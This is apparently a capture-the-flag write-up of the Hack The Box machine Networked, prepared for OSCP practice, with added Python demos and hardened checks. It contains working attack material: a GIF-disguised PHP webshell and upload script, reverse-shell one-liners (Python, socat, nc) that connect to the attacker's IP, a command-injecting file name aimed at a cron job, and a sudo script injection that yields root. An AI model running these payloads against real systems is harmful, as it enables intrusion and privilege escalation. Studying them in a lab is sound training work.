Hack The Box — Networked — without Metasploit (TJNull’s list for OSCP)

Daniyal Ahmed
May 22, 2023
Networked

This is my 15th write-up, this time for Networked, a machine from TJNull’s list of HackTheBox machines for OSCP practice. The full list can be found here.

In a typical penetration test or CTF there are three major phases:

  1. Enumeration and Scanning (Information Gathering).
  2. Initial Foothold.
  3. Privilege Escalation.

Let’s get started with the box!

Enumeration

In order to hack into a system we first need to gather some information about it. We use Nmap to scan the ports of the target machine and find out which services are running, since those are what we can attack. First we find the open ports, then we run a detailed scan only on those ports to save time.

nmap -p- 10.129.182.37 --max-retries=2
nmap all ports

So, ports 22 and 80 are open. Let’s run a detailed scan on these two ports.

nmap -sC -sV -T4 -A -p22,80 10.129.182.37
targeted nmap

This doesn’t reveal much beyond the Apache and OpenSSH versions.

Let’s see what we have on the web server.

web server

Just a note. Let’s look at the page source.

view-source of the web server home page

Let’s run gobuster on it.

gobuster dir -u http://10.129.182.37 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.txt -x php,html,log,txt -t 200 -k --no-error

After a short while we get upload.php and /backup.

Let’s navigate to upload.php first and see what we have there.

We have a file upload page. This could be used to upload a PHP shell.

Let’s try to upload a PHP shell.

It says ‘Invalid image file.’, which indicates that it only accepts images.

Let’s see what we have in the /backup.

A tar archive. This could be interesting. Let’s download and extract it.

It contains the source of upload.php, along with a file we didn’t know about, photos.php.

Initial foothold

Let’s see what we have in upload.php.

The code checks the file type and the file size. The file type check is a call to check_file_type, which isn’t defined in upload.php itself; looking through the other files in the backup, we find it in lib.php.

check_file_type in lib.php

It checks the MIME type of the file, and the MIME type is determined from the file’s content (its magic bytes), not from its name. We can satisfy that by simply adding ‘GIF8;’ at the start of our PHP shell, which makes the file look like a GIF.

Let’s try to upload the file.

It’s still rejected, but the error message is rendered differently from the last one, so a different check is failing this time. Let’s look at upload.php again.

It also checks the file extension at the end of the file name.

Let’s rename our shell from shell.php to shell.php.jpg and upload it again.

It’s uploaded successfully.

Let’s check the /uploads directory.

There’s nothing here, just a full stop mocking us!

Let’s try photos.php, because it sounds like a gallery.

We see the CentOS PNG files along with our uploaded .php.jpg file. It has no thumbnail, since it isn’t actually an image. We can right-click it and ‘open image in new tab’ to navigate to the file. Note that upload.php stored it under our IP address with the dots replaced by underscores (10_10_14_64.php.jpg), so the URL of an uploaded file is predictable.

The page shows the GIF8; we added to the file and nothing else: the PHP part was executed rather than displayed. That works here because the server hands any file with .php somewhere in its extension chain to the PHP interpreter (the behaviour of mod_php’s AddHandler), so shell.php.jpg is still executed as PHP; on a server that only matches a final .php extension it would be served as a static image. Let’s give the script a cmd parameter in the URL.

http://10.129.182.37/uploads/10_10_14_64.php.jpg?cmd=whoami

The shell returns the command output. Let’s get a reverse shell.
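The whole upload bypass as a script, added here as an example and not part of the original write-up. It builds the GIF8;-prefixed PHP file, re-creates in Python the two checks described for lib.php and upload.php to show exactly why shell.php.jpg passes and shell.php does not, puts a hardened version of the check next to it, and finally uploads the file and calls the webshell. The MIME sniffing is a simplified stand-in for libmagic, the webshell body, the form field names (myFile, submit) and the size limit are assumptions, and the addresses come from the write-up.

```python
import secrets
import urllib.parse
import urllib.request
import uuid
from typing import Optional

# Assumed: a minimal webshell. The write-up only shows it answering ?cmd=...
PHP_SHELL = b'<?php system($_GET["cmd"]); ?>'
# Extensions upload.php accepts at the *end* of the name, as the write-up describes.
ALLOWED_EXT = (".jpg", ".jpeg", ".png", ".gif")
MAX_SIZE = 60000  # assumed limit; the write-up only says a size check exists


def build_polyglot(php: bytes = PHP_SHELL) -> bytes:
    """Prefix GIF magic so a content-based type check reports image/gif.
    libmagic keys on the leading 'GIF8', so 'GIF8;' is enough. PHP echoes
    everything before the '<?php' tag, which is why the shell's output
    starts with 'GIF8;'."""
    return b"GIF8;" + php


def sniff_mime(data: bytes) -> str:
    """Simplified stand-in for finfo/libmagic: type from leading bytes only."""
    if data.startswith(b"GIF8"):
        return "image/gif"
    if data.startswith(b"\x89PNG\r\n\x1a\n"):
        return "image/png"
    if data.startswith(b"\xff\xd8\xff"):
        return "image/jpeg"
    return "application/octet-stream"


def vulnerable_check(filename: str, data: bytes) -> bool:
    """The checks the write-up describes: image/* MIME, size limit, and a name
    that *ends with* an allowed extension. Nothing looks at the inner '.php'."""
    if len(data) >= MAX_SIZE or not sniff_mime(data).startswith("image/"):
        return False
    return filename.lower().endswith(ALLOWED_EXT)


def hardened_check(filename: str, data: bytes) -> Optional[str]:
    """Return a server-chosen storage name, or None to reject.
    Only the final extension counts, it must agree with the sniffed type, and
    the stored name is random so no user-controlled text (such as an inner
    '.php') reaches the filesystem. Content sniffing alone is still bypassable
    (PHP inside a valid GIF comment), so the uploads directory must also never
    be served through the PHP handler."""
    if len(data) >= MAX_SIZE:
        return None
    ext = filename.lower().rsplit(".", 1)[-1] if "." in filename else ""
    for_mime = {"image/gif": {"gif"}, "image/png": {"png"}, "image/jpeg": {"jpg", "jpeg"}}
    if ext not in for_mime.get(sniff_mime(data), set()):
        return None
    return f"{secrets.token_hex(8)}.{ext}"


def multipart_body(field: str, filename: str, data: bytes, extra: dict) -> tuple:
    """Build a multipart/form-data body by hand (no third-party HTTP library)."""
    boundary = uuid.uuid4().hex
    parts = []
    for name, value in extra.items():
        parts.append(
            f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n{value}\r\n'.encode()
        )
    parts.append(
        f'--{boundary}\r\nContent-Disposition: form-data; name="{field}"; '
        f'filename="{filename}"\r\nContent-Type: image/gif\r\n\r\n'.encode()
        + data + b"\r\n"
    )
    parts.append(f"--{boundary}--\r\n".encode())
    return boundary, b"".join(parts)


def upload(url: str, filename: str, data: bytes) -> bytes:
    """POST the polyglot to upload.php. Field names are assumptions."""
    boundary, body = multipart_body("myFile", filename, data, {"submit": "go"})
    req = urllib.request.Request(url, data=body, method="POST")
    req.add_header("Content-Type", f"multipart/form-data; boundary={boundary}")
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read()


def run_cmd(shell_url: str, cmd: str) -> bytes:
    """Call the uploaded shell; urlencode() takes care of spaces and quotes."""
    url = shell_url + "?" + urllib.parse.urlencode({"cmd": cmd})
    with urllib.request.urlopen(url, timeout=10) as resp:
        return resp.read()


if __name__ == "__main__":
    payload = build_polyglot()
    # The write-up's filename 10_10_14_64.php.jpg shows the upload is stored
    # under the uploader's IP with dots replaced, so the shell URL is known.
    print(upload("http://10.129.182.37/upload.php", "shell.php.jpg", payload).decode(errors="replace"))
    print(run_cmd("http://10.129.182.37/uploads/10_10_14_64.php.jpg", "whoami").decode())
```

The two check functions are the point of the block: vulnerable_check accepts shell.php.jpg because endswith() only looks at the tail of the name, while hardened_check rejects it because the final extension (jpg) disagrees with the sniffed type (gif) and, even for a consistent upload, never stores a user-chosen name.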

I prefer a Python shell when Python is installed, because it usually gives a more stable shell.

http://10.129.182.37/uploads/10_10_14_64.php.jpg?cmd=which+python

Python is installed in /usr/bin/python

Let’s start a netcat listener on port 4242 on our attacking machine.

nc -lvnp 4242

Let’s get a shell by passing a Python reverse shell one-liner to our webshell (the browser URL-encodes the spaces and quotes for us).

http://10.129.182.37/uploads/10_10_14_64.php.jpg?cmd=python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.64",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'

And we got a shell! Let’s upgrade it to a full tty.

It looks like socat is already installed on the target, which makes the job easy.

Let’s start a socat listener on a different terminal session on port 4243.

socat file:`tty`,raw,echo=0 TCP-L:4243

Let’s initiate a shell from the target now.

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.64:4243

Let’s see if our listener grabbed it.

And it did!

Privilege Escalation

First, let’s see which users exist on the target.

cat /etc/passwd

Along with root, there’s another user named guly.

Let’s see if we can access the home directory of that user.

cd /home/guly

We have a user.txt file containing the flag, but only guly can read it. We also have a crontab.guly file, and judging from its permissions (-rw-r--r--) we can read it.

It is a cron job that runs every 3 minutes and executes check_attack.php.

check_attack.php is in this home directory as well, and judging by its permissions, we can read it too.

It looks like we have a command injection vulnerability here.

The code first sets a variable $path to /var/www/html/uploads/ and calls scandir() on it; scandir() lists the files and directories in that path, much like ls or dir. Each entry ($value) is then concatenated into a command string that is handed to exec(), so the file name ends up inside a shell command without any quoting. If we can write files into /var/www/html/uploads, we can create a file whose name starts and ends with a semicolon, so that the shell parses the name as a separate command.

POC:

If we create a file with the name

; nc 10.10.14.64 1338 -c bash;

and start a listener on a new terminal session, then when the cron job runs it will scandir() the uploads directory, pick up our file, and exec() a string along the lines of

rm -f /var/www/html/uploads/; nc 10.10.14.64 1338 -c bash;

The shell treats each semicolon as a command separator: rm -f runs against the directory (and fails harmlessly), and then our nc command runs with guly’s privileges.

Let’s check it.

The apache user has write permission on this directory.

Let’s create the file with touch <malicious file name>. Note that the name contains no slash: a file name cannot contain ‘/’, so /bin/bash or /dev/tcp are off limits, but nc and bash are found through PATH. The -c option works because the target’s nc is nmap’s ncat (the default on CentOS); the OpenBSD netcat has no such option.

touch '; nc 10.10.14.64 1338 -c bash'

With a listener on port 1338 running, let’s wait up to 3 minutes for the cron job to fire and deliver the shell.
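A local reproduction of the injection, added here as an example and not taken from the original write-up. A stand-in for the cron job’s cleanup builds the same kind of rm -f $path$value string and hands it to a shell, exactly as the PHP exec() call does, once with the file name interpolated unquoted and once with the name passed as a separate argv element. The directory contents and the echo used in place of nc are constructed for the demo.

```python
import os
import subprocess
import tempfile

# Constructed stand-in for the write-up's reverse-shell filename
# ('; nc 10.10.14.64 1338 -c bash'). Same shape: no '/' (a filename cannot
# contain one) and a leading ';' that terminates the rm the cron job intended.
INJECTED_NAME = "; echo INJECTED;"


def vulnerable_cleanup(uploads: str) -> str:
    """Mirror of exec("... rm -f $path$value"): the entry name is pasted into
    a shell command string, so shell metacharacters in it are honoured.
    Returns whatever the injected commands printed."""
    printed = []
    for value in sorted(os.listdir(uploads)):          # scandir() equivalent
        cmd = f"rm -f {uploads}/{value}"                # $path$value, unquoted
        r = subprocess.run(["sh", "-c", cmd], capture_output=True, text=True)
        printed.append(r.stdout)
    return "".join(printed)


def safe_cleanup(uploads: str) -> None:
    """Fixed version: rm receives the name as one argv element, so no shell
    ever parses it. In PHP the equivalent is escapeshellarg($path.$value),
    or better, unlink() without spawning a shell at all."""
    for value in os.listdir(uploads):
        subprocess.run(["rm", "-f", os.path.join(uploads, value)], check=False)


def demo() -> tuple:
    """Constructed uploads directory with a benign upload and the malicious
    name; run both cleanups and report what happened."""
    with tempfile.TemporaryDirectory() as uploads:
        for name in ("10_10_14_64.php.jpg", INJECTED_NAME):
            open(os.path.join(uploads, name), "w").close()
        output = vulnerable_cleanup(uploads)
        # rm -f ran against the directory itself and failed, so the file named
        # after a command survives, and the command in its name executed.
        left_after_vulnerable = sorted(os.listdir(uploads))
        safe_cleanup(uploads)
        left_after_safe = sorted(os.listdir(uploads))
    return output, left_after_vulnerable, left_after_safe


if __name__ == "__main__":
    out, vuln_left, safe_left = demo()
    print("injected command printed:", out.strip())
    print("left after vulnerable cleanup:", vuln_left)
    print("left after safe cleanup:", safe_left)
```

The benign file is removed by both versions; the difference is what happens to the name that contains semicolons. With the unquoted string the shell runs rm on the directory and then runs the injected command, so the malicious entry is never deleted and would fire again on every cron run. With argv passing, rm simply deletes a file that happens to have an odd name.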

And we are guly now.

Let’s again use socat to get a proper tty: start the listener on our machine first, then connect back from the target.

Checking the listener, we have a fully interactive shell as guly.

user.txt

Getting root

Let’s see what commands we can run as sudo with guly.

We can run /usr/local/sbin/changename.sh as root with no password.

Let’s read the contents of that file first.

From the first two lines it seems that it takes some inputs and writes them into /etc/sysconfig/network-scripts/ifcfg-guly.

Let’s run it, give it some inputs and check that file.

Now let’s read the file /etc/sysconfig/network-scripts/ifcfg-guly

The inputs I gave have been assigned to those variables.

Reading the code again, the script uses read to take each input and then echo to write it into the file as VAR=value. Nothing stops a value from containing a space, and that is where the vulnerability lies: ifcfg-* files under /etc/sysconfig/network-scripts are not parsed as plain data, they are sourced as shell by the network scripts when the interface is brought up, which is what happens after the file has been written. In bash, a line of the form

x=anything <command>

is a temporary variable assignment followed by a command, so it runs the command that comes afterwards, just like in the screenshot below.

Let’s run the script again with sudo and give a shell command in any of the inputs.

By injecting /bin/bash in any of the inputs, we get a root shell :)
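The mechanism behind the root shell, reproduced locally as an added example (not code from the write-up). An ifcfg-style file is written the way the script writes it, with VAR=value and no quoting, and then sourced the way the network scripts source ifcfg files; sourcing runs the “value” as a command, while a line-by-line parser reads the same file as data. The file contents, and the echo standing in for /bin/bash, are constructed for the demo; the write-up does not show the script’s source, so it is not reproduced here.

```python
import os
import re
import shlex
import subprocess
import tempfile
from typing import Dict, Tuple

# Constructed stand-in for the write-up's 'anything /bin/bash' input: it prints
# instead of opening an interactive shell, so the effect shows up in a test.
MALICIOUS_VALUE = "anything echo INJECTED"

# What an interface setting should be allowed to look like: no whitespace and
# no shell metacharacters. Accepting the space is what makes injection possible.
VALID_VALUE = re.compile(r"^[A-Za-z0-9_.-]+$")


def write_ifcfg(path: str, entries: Dict[str, str], quote: bool) -> None:
    """Write VAR=value lines the way the script does with echo (quote=False),
    or with the value shell-quoted so sourcing can only assign it (quote=True)."""
    with open(path, "w") as f:
        for var, value in entries.items():
            f.write(f"{var}={shlex.quote(value) if quote else value}\n")


def source_ifcfg(path: str) -> str:
    """What the network scripts do when the interface comes up: source the
    ifcfg file as shell. With an unquoted 'NAME=anything echo INJECTED' line,
    bash sees a temporary assignment followed by a command and runs the
    command (as root when reached through sudo). Returns bash's stdout."""
    script = f'. {shlex.quote(path)}; echo "NAME=${{NAME-unset}}"'
    env = {"PATH": os.environ.get("PATH", "/usr/bin:/bin")}  # guarantees NAME starts unset
    r = subprocess.run(["bash", "-c", script], capture_output=True, text=True, env=env)
    return r.stdout


def parse_ifcfg(path: str) -> Dict[str, str]:
    """Safe reader: split KEY=VALUE lines as data and never execute anything."""
    settings: Dict[str, str] = {}
    with open(path) as f:
        for line in f:
            line = line.strip()
            if not line or line.startswith("#") or "=" not in line:
                continue
            key, _, value = line.partition("=")
            settings[key] = value
    return settings


def accept_value(value: str) -> bool:
    """Validation the script should apply before echoing a value into a file
    that will later be sourced."""
    return bool(VALID_VALUE.match(value))


def demo() -> Tuple[str, Dict[str, str], str]:
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "ifcfg-guly")  # constructed copy, not the real file
        write_ifcfg(path, {"NAME": MALICIOUS_VALUE}, quote=False)
        unquoted = source_ifcfg(path)     # runs the injected command
        parsed = parse_ifcfg(path)        # same file, read as data
        write_ifcfg(path, {"NAME": MALICIOUS_VALUE}, quote=True)
        quoted = source_ifcfg(path)       # only an assignment happens
    return unquoted, parsed, quoted


if __name__ == "__main__":
    unquoted, parsed, quoted = demo()
    print("sourced unquoted:", repr(unquoted))
    print("parsed as data:", parsed)
    print("sourced quoted:", repr(quoted))
    print("accept 'anything echo INJECTED'?", accept_value(MALICIOUS_VALUE))
```

Two details are worth noticing in the unquoted run: the injected command executes, and NAME is still unset afterwards, because bash treated NAME=anything as an environment prefix for that command rather than as the setting the script meant to store. Quoting the value on write, or rejecting anything that fails accept_value, closes the hole from the script’s side; reading ifcfg files with a parser instead of sourcing them closes it from the consumer’s side.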
